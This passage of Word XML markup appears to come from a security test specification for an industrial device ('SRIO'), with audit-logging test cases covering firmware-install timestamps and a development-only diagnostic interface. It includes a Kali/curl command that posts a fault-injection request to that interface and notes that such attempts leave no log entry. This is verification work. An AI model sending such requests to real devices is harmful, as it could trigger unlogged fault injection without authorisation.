              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B2D32" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="004B2D32" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Target </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D15F36E" w14:textId="2E36858C"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Repudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B2D32" w:rsidRPr="006D5B99"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0B0D65C1" w14:textId="3A9D984D" w:rsidR="004B2D32" w:rsidRPr="006D5B99"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6D5B99"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3277E800" w14:textId="31FF623E" w:rsidR="004B2D32" w:rsidRPr="006D5B99"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demonstrate that the install cold start resets the uptime reference and that no absolute timestamp is attached to either the pre- or post-install state.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B2D32" w:rsidRPr="006D5B99"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8D38CA4" w14:textId="52C53B10" w:rsidR="004B2D32" w:rsidRPr="006D5B99"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the TC-</w:t>
            </w:r>
            <w:r w:rsidR="00775452" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>003-</w:t>
            </w:r>
            <w:r w:rsidR="00775452" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>04</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> method around a firmware install; record against RQ-008 traceability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B2D32" w:rsidRPr="006D5B99"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67757273" w14:textId="6A5DA07A" w:rsidR="004B2D32" w:rsidRPr="006D5B99"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uptime resets, no absolute timestamp on the install event </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 2.11 unmet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DE93B87" w14:textId="77777777" w:rsidR="004B2D32" w:rsidRPr="006D5B99" w:rsidRDefault="004B2D32" w:rsidP="004B2D32">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="279DA959"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6C06A48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2B0369B1" w14:textId="5B973B15"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TC-RQ008-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B2D32" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="004B2D32" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E14BCC3" w14:textId="7DF97FC2" w:rsidR="004B2D32" w:rsidRPr="006D5B99" w:rsidRDefault="008A681E"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Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B2D32" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="004B2D32" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1237CB79" w14:textId="62F520E3"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curl, TIA.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B2D32" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="004B2D32" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19DD6298" w14:textId="06AA489A" w:rsidR="004B2D32" w:rsidRPr="006D5B99"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Execute the TC-RQ003-04 method around a firmware install; record under RQ-008.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B2D32" w:rsidRPr="006D5B99"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02249242" w:rsidR="004B2D32" w:rsidRPr="006D5B99" w:rsidRDefault="00463B17" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28CEE9DA" w14:textId="16066196" w:rsidR="004B2D32" w:rsidRPr="006D5B99" w:rsidRDefault="000A734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uptime resets, no absolute timestamp on the install event (CR 2.11 unmet). Evidence: systick before/after install. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CD5BAC4" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DCC9F38" w14:textId="044037E2" w:rsidR="004B2D32" w:rsidRPr="006D5B99" w:rsidRDefault="004B2D32" w:rsidP="004B2D32">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ008-05 - </w:t>
      </w:r>
      <w:r w:rsidR="002D0E80" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Excluded (Development-Only) Interface Produces No Evidence </w:t>
      </w:r>
      <w:r w:rsidR="002D0E80" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>⇄</w:t>
      </w:r>
      <w:r w:rsidR="002D0E80" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TC-</w:t>
      </w:r>
      <w:r w:rsidR="00775452" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ</w:t>
      </w:r>
      <w:r w:rsidR="002D0E80" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>003-</w:t>
      </w:r>
      <w:r w:rsidR="00775452" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E05108B" w14:textId="77777777" w:rsidR="004B2D32" w:rsidRPr="006D5B99" w:rsidRDefault="004B2D32" w:rsidP="004B2D32">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13587F3D" w14:textId="77777777" w:rsidR="004B2D32" w:rsidRPr="006D5B99" w:rsidRDefault="004B2D32" w:rsidP="004B2D3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6D5B99"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6D5B99" w:rsidRDefault="004B2D32" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="770C3315"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6D5B99" w:rsidRDefault="004B2D32" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D8B8E16" w14:textId="66F35FC9"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RQ-008 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t xml:space="preserve"> EDR 2.13 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset D, Asset I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B2D32" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="004B2D32" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AEEE796" w14:textId="56F2A580" w:rsidR="004B2D32" w:rsidRPr="006D5B99"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4B2D32" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="004B2D32" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59CB5FFE" w14:textId="047D1590" w:rsidR="004B2D32" w:rsidRPr="006D5B99"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4B2D32" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="004B2D32" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C12767C" w14:textId="32EB2127" w:rsidR="004B2D32" w:rsidRPr="006D5B99"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05</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, confirm the production-gated diagnostic path is rejected on a production unit and that exercising the excluded interface produces no log entry.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B2D32" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="004B2D32" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CB68807" w14:textId="77777777" w:rsidR="0061252E"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2F350D07" w14:textId="1D1D00DB" w:rsidR="004B2D32" w:rsidRPr="006D5B99"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against RQ-008</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B2D32" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="004B2D32" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51177F14" w14:textId="54088A1A" w:rsidR="005C402F"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TC-</w:t>
            </w:r>
            <w:r w:rsidR="00775452" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>003-</w:t>
            </w:r>
            <w:r w:rsidR="00775452" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>05</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D4F2A45" w14:textId="018D76C6" w:rsidR="004B2D32" w:rsidRPr="006D5B99"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gap: excluded interface produces no evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C06210F" w14:textId="77777777" w:rsidR="004B2D32" w:rsidRPr="006D5B99" w:rsidRDefault="004B2D32" w:rsidP="004B2D32">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="222F2906" w14:textId="77777777" w:rsidR="004B2D32" w:rsidRPr="006D5B99" w:rsidRDefault="004B2D32" w:rsidP="004B2D32">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6D5B99"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6D5B99" w:rsidRDefault="004B2D32" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="343B17A4" w14:textId="77777777" w:rsidR="004B2D32" w:rsidRPr="006D5B99"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4B2D32" w:rsidRPr="006D5B99" w14:paraId="033DFC17" w14:textId="77777777" w:rsidTr="00BC73A7">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1"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6D5B99" w:rsidRDefault="004B2D32" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B7B4620" w14:textId="1D5C619C" w:rsidR="004B2D32" w:rsidRPr="006D5B99"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TC-RQ008-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463B17" w:rsidRPr="006D5B99"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63B17" w:rsidRPr="006D5B99" w:rsidRDefault="00463B17" w:rsidP="00463B17">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28E8A26D" w14:textId="0CB7852C"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Kali, directly against SRIO </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463B17" w:rsidRPr="006D5B99"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63B17" w:rsidRPr="006D5B99" w:rsidRDefault="00463B17" w:rsidP="00463B17">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67D0CFF2" w14:textId="777CACB7"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463B17" w:rsidRPr="006D5B99"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63B17" w:rsidRPr="006D5B99" w:rsidRDefault="00463B17" w:rsidP="00463B17">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="450407F7"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6B2711C" w14:textId="77777777" w:rsidR="00463B17" w:rsidRPr="006D5B99" w:rsidRDefault="00463B17" w:rsidP="00463B1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curl -s -X POST http://$SRIO/fit/setfit -d '{"type":1}' -w "%{http_code}\n" | tee cm_rq008-05_fit.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D7B19DC" w14:textId="409F961B" w:rsidR="00463B17" w:rsidRPr="006D5B99" w:rsidRDefault="00463B17" w:rsidP="00463B1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cm_rq008-05_errorlog.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463B17" w:rsidRPr="006D5B99"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3E82B1C4" w:rsidR="00463B17" w:rsidRPr="006D5B99" w:rsidRDefault="00083BB7" w:rsidP="00463B17">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39C01B67" w14:textId="0965990C" w:rsidR="00463B17" w:rsidRPr="006D5B99" w:rsidRDefault="00463B17" w:rsidP="00463B17">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rejection (HTTP error code / service not executable) and NO new log entry for this attempt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="022FF458" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76526E77" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A72D2F0" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34427339" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F5A4A7E" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D62A331" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DD003B2" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F228170" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36E03D39" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B5DE1A" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3682D8CF" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BB92765" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
